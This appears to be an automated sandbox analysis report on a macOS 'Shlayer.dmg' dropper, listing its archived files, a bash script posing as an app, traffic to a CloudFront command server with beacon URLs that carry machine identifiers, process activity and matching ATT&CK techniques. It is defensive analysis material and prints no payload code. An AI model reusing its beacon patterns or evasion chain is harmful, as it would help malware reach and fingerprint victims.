File Content Preview:	x.c`..C.......3.....k.].....}x.su.T.p..a``d.a``.R...H.y.P......0(.F...v.z...W..e?....o..;.;..F........x......a....XlW.....A...d.<D.....................n.IJU.,.e...`.\|.W..>l^.n..v....s.%....rJ.................?.....x...Ko.U...w...M(.-....1.0.h.T1.o.h...TB.

Archive DMG

Archived Files

File Path	File Attributes	File Size
Installer/.DS_Store		16388
Installer/.nFO7evVxM9sjuU.png		14952
Installer/Install		17
Installer/yWnBJLaF/1302.app/Contents/MacOS/1302		59039
Installer/yWnBJLaF/1302.app/Icon		0

Extracted Files

Extracted File
File path:	Installer/.DS_Store
File size:	16388
File type:	data

Extracted File
File path:	Installer/.nFO7evVxM9sjuU.png
File size:	14952
File type:	PNG image, 380 x 330, 8-bit/color RGB, non-interlaced

Extracted File
File path:	Installer/yWnBJLaF/1302.app/Contents/MacOS/1302
File size:	59039
File type:	Bourne-Again shell script text executable

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 28, 2021 10:02:06.845844984 MESZ	49466	80	192.168.0.51	143.204.214.77
Apr 28, 2021 10:02:06.853750944 MESZ	80	49466	143.204.214.77	192.168.0.51
Apr 28, 2021 10:02:06.854151011 MESZ	49466	80	192.168.0.51	143.204.214.77
Apr 28, 2021 10:02:06.854250908 MESZ	49466	80	192.168.0.51	143.204.214.77
Apr 28, 2021 10:02:06.862179995 MESZ	80	49466	143.204.214.77	192.168.0.51
Apr 28, 2021 10:02:07.147759914 MESZ	80	49466	143.204.214.77	192.168.0.51
Apr 28, 2021 10:02:07.148226976 MESZ	49466	80	192.168.0.51	143.204.214.77
Apr 28, 2021 10:02:07.149277925 MESZ	49466	80	192.168.0.51	143.204.214.77
Apr 28, 2021 10:02:07.157599926 MESZ	80	49466	143.204.214.77	192.168.0.51
Apr 28, 2021 10:02:07.158993959 MESZ	49466	80	192.168.0.51	143.204.214.77
Apr 28, 2021 10:02:07.176248074 MESZ	49467	80	192.168.0.51	143.204.214.77
Apr 28, 2021 10:02:07.184148073 MESZ	80	49467	143.204.214.77	192.168.0.51
Apr 28, 2021 10:02:07.184632063 MESZ	49467	80	192.168.0.51	143.204.214.77
Apr 28, 2021 10:02:07.184670925 MESZ	49467	80	192.168.0.51	143.204.214.77
Apr 28, 2021 10:02:07.192576885 MESZ	80	49467	143.204.214.77	192.168.0.51
Apr 28, 2021 10:02:07.336486101 MESZ	80	49467	143.204.214.77	192.168.0.51
Apr 28, 2021 10:02:07.336968899 MESZ	49467	80	192.168.0.51	143.204.214.77
Apr 28, 2021 10:02:07.337954998 MESZ	49467	80	192.168.0.51	143.204.214.77
Apr 28, 2021 10:02:07.346172094 MESZ	80	49467	143.204.214.77	192.168.0.51
Apr 28, 2021 10:02:07.347462893 MESZ	49467	80	192.168.0.51	143.204.214.77
Apr 28, 2021 10:02:07.364418030 MESZ	49468	80	192.168.0.51	143.204.214.77
Apr 28, 2021 10:02:07.372353077 MESZ	80	49468	143.204.214.77	192.168.0.51
Apr 28, 2021 10:02:07.372807980 MESZ	49468	80	192.168.0.51	143.204.214.77
Apr 28, 2021 10:02:07.372859001 MESZ	49468	80	192.168.0.51	143.204.214.77
Apr 28, 2021 10:02:07.380795002 MESZ	80	49468	143.204.214.77	192.168.0.51
Apr 28, 2021 10:02:07.694030046 MESZ	80	49468	143.204.214.77	192.168.0.51
Apr 28, 2021 10:02:07.694055080 MESZ	80	49468	143.204.214.77	192.168.0.51
Apr 28, 2021 10:02:07.694071054 MESZ	80	49468	143.204.214.77	192.168.0.51
Apr 28, 2021 10:02:07.694503069 MESZ	49468	80	192.168.0.51	143.204.214.77
Apr 28, 2021 10:02:07.694528103 MESZ	49468	80	192.168.0.51	143.204.214.77
Apr 28, 2021 10:02:07.695456028 MESZ	49468	80	192.168.0.51	143.204.214.77
Apr 28, 2021 10:02:07.703350067 MESZ	80	49468	143.204.214.77	192.168.0.51
Apr 28, 2021 10:02:07.720549107 MESZ	49469	80	192.168.0.51	143.204.214.77
Apr 28, 2021 10:02:07.728442907 MESZ	80	49469	143.204.214.77	192.168.0.51
Apr 28, 2021 10:02:07.728898048 MESZ	49469	80	192.168.0.51	143.204.214.77
Apr 28, 2021 10:02:07.728939056 MESZ	49469	80	192.168.0.51	143.204.214.77
Apr 28, 2021 10:02:07.736860037 MESZ	80	49469	143.204.214.77	192.168.0.51
Apr 28, 2021 10:02:07.880922079 MESZ	80	49469	143.204.214.77	192.168.0.51
Apr 28, 2021 10:02:07.881136894 MESZ	49469	80	192.168.0.51	143.204.214.77
Apr 28, 2021 10:02:07.882019997 MESZ	49469	80	192.168.0.51	143.204.214.77
Apr 28, 2021 10:02:07.889816046 MESZ	80	49469	143.204.214.77	192.168.0.51
Apr 28, 2021 10:02:07.889960051 MESZ	49469	80	192.168.0.51	143.204.214.77

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 28, 2021 10:02:06.812388897 MESZ	59181	53	192.168.0.51	8.8.8.8
Apr 28, 2021 10:02:06.842232943 MESZ	53	59181	8.8.8.8	192.168.0.51

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 28, 2021 10:02:06.812388897 MESZ	192.168.0.51	8.8.8.8	0x9b9d	Standard query (0)	d3vav6z7pfe066.cloudfront.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Apr 28, 2021 10:02:06.842232943 MESZ	8.8.8.8	192.168.0.51	0x9b9d	No error (0)	d3vav6z7pfe066.cloudfront.net	143.204.214.77	A (IP address)	IN (0x0001)
Apr 28, 2021 10:02:06.842232943 MESZ	8.8.8.8	192.168.0.51	0x9b9d	No error (0)	d3vav6z7pfe066.cloudfront.net	143.204.214.182	A (IP address)	IN (0x0001)
Apr 28, 2021 10:02:06.842232943 MESZ	8.8.8.8	192.168.0.51	0x9b9d	No error (0)	d3vav6z7pfe066.cloudfront.net	143.204.214.175	A (IP address)	IN (0x0001)
Apr 28, 2021 10:02:06.842232943 MESZ	8.8.8.8	192.168.0.51	0x9b9d	No error (0)	d3vav6z7pfe066.cloudfront.net	143.204.214.146	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

d3vav6z7pfe066.cloudfront.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.0.51	49466	143.204.214.77	80

Timestamp	kBytes transferred	Direction	Data
Apr 28, 2021 10:02:06.854250908 MESZ	0	OUT	GET /slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=0&gs=1 HTTP/1.1 Host: d3vav6z7pfe066.cloudfront.net User-Agent: curl/7.54.0 Accept: /
Apr 28, 2021 10:02:07.147759914 MESZ	1	IN	HTTP/1.1 200 OK Content-Type: text/html Content-Length: 0 Connection: keep-alive Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Server: Microsoft-IIS/7.5 Access-Control-Allow-Origin: * X-AspNet-Version: 4.0.30319 p3p: CP="CAO PSA OUR" Date: Wed, 28 Apr 2021 08:02:07 GMT X-Cache: Miss from cloudfront Via: 1.1 fc7091924e65025d5bfb92361ec3e660.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA53-C1 X-Amz-Cf-Id: R_51QFNo6g4BadU2EoiMLRz4QjcsAGxpdc6_rBPaM-yerB5GTQYNpw==

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.0.51	49467	143.204.214.77	80

Timestamp	kBytes transferred	Direction	Data
Apr 28, 2021 10:02:07.184670925 MESZ	1	OUT	GET /slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=1&gs=1 HTTP/1.1 Host: d3vav6z7pfe066.cloudfront.net User-Agent: curl/7.54.0 Accept: /
Apr 28, 2021 10:02:07.336486101 MESZ	2	IN	HTTP/1.1 200 OK Content-Type: text/html Content-Length: 0 Connection: keep-alive Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Server: Microsoft-IIS/7.5 Access-Control-Allow-Origin: * X-AspNet-Version: 4.0.30319 p3p: CP="CAO PSA OUR" Date: Wed, 28 Apr 2021 08:02:07 GMT X-Cache: Miss from cloudfront Via: 1.1 fc7091924e65025d5bfb92361ec3e660.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA53-C1 X-Amz-Cf-Id: KqpP2NgCxVIfnuA6GBm1NifEd-vGenWA_QrQAul_nAMw4AuVZ_Lp3Q==

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.0.51	49468	143.204.214.77	80

Timestamp	kBytes transferred	Direction	Data
Apr 28, 2021 10:02:07.372859001 MESZ	3	OUT	GET /sd/?c=3mlybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&o=10.14.4&b=12745028138&gs=1 HTTP/1.0 Host: d3vav6z7pfe066.cloudfront.net User-Agent: curl/7.54.0 Accept: /
Apr 28, 2021 10:02:07.694030046 MESZ	4	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 1245 Connection: close Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Server: Microsoft-IIS/7.5 Access-Control-Allow-Origin: * X-AspNet-Version: 4.0.30319 p3p: CP="CAO PSA OUR" Date: Wed, 28 Apr 2021 08:02:06 GMT X-Cache: Error from cloudfront Via: 1.1 4809763494a078a525dc1a2dff5ddf6c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA53-C1 X-Amz-Cf-Id: EKb96V9Hg_WLxo8MSM04zh0ql32i-BswzYDBFD5T233DhhbXqrw05g== Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;marg
Apr 28, 2021 10:02:07.694055080 MESZ	5	IN	Data Raw: 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 Data Ascii: in-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.0.51	49469	143.204.214.77	80

Timestamp	kBytes transferred	Direction	Data
Apr 28, 2021 10:02:07.728939056 MESZ	5	OUT	GET /slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=3&gs=1 HTTP/1.1 Host: d3vav6z7pfe066.cloudfront.net User-Agent: curl/7.54.0 Accept: /
Apr 28, 2021 10:02:07.880922079 MESZ	6	IN	HTTP/1.1 200 OK Content-Type: text/html Content-Length: 0 Connection: keep-alive Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Server: Microsoft-IIS/7.5 Access-Control-Allow-Origin: * X-AspNet-Version: 4.0.30319 p3p: CP="CAO PSA OUR" Date: Wed, 28 Apr 2021 08:02:07 GMT X-Cache: Miss from cloudfront Via: 1.1 d16428714e022976873ccc980fdc1289.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA53-C1 X-Amz-Cf-Id: KepoeaO8AdCwug8EuJ0CoYpSfjveULuTclFCZi97nHxANDVEf-1aww==

System Behavior

Analysis Process: xpcproxy PID: 965 Parent PID: 1

General

Start time:	10:02:03
Start date:	28/04/2021
Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	44048 bytes
MD5 hash:	4782e7ebd2985d32bc84f1f71c8f8fb7

Start time:	10:02:04
Start date:	28/04/2021
Path:	/usr/bin/mktemp
Arguments:	mktemp -t Installer
File size:	18800 bytes
MD5 hash:	295fb8cee272a251f798cc4b1a713251

Start time:	10:02:05
Start date:	28/04/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Start time:	10:02:06
Start date:	28/04/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.
Tactics:	Defense Evasion
Data Sources:	API monitoring, Authentication logs, File monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls. In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called `com.apple.quarantine` . This attribute is read by Apple's Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file formats that can encrypt files are RAR and zip.
Tactics:	Exfiltration
Data Sources:
Platforms:	Android, iOS
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Shlayer.dmg

Overview

General Information

Detection

Signatures

Classification

Startup

Yara Overview

Initial Sample

Signature Overview

Cryptography:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

General Information

Runtime Messages

Created / dropped Files

Static File Info

General

Archive DMG

Archived Files

Extracted Files

Extracted File

Extracted File

Extracted File

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

System Behavior

Analysis Process: xpcproxy PID: 965 Parent PID: 1

General

Analysis Process: 1302 PID: 965 Parent PID: 1

General

Analysis Process: bash PID: 966 Parent PID: 965

General

Analysis Process: mktemp PID: 966 Parent PID: 965

General

Analysis Process: bash PID: 967 Parent PID: 965

General

Analysis Process: tail PID: 967 Parent PID: 965

General

Analysis Process: bash PID: 968 Parent PID: 965

General

Analysis Process: funzip PID: 968 Parent PID: 965

General

Analysis Process: bash PID: 969 Parent PID: 965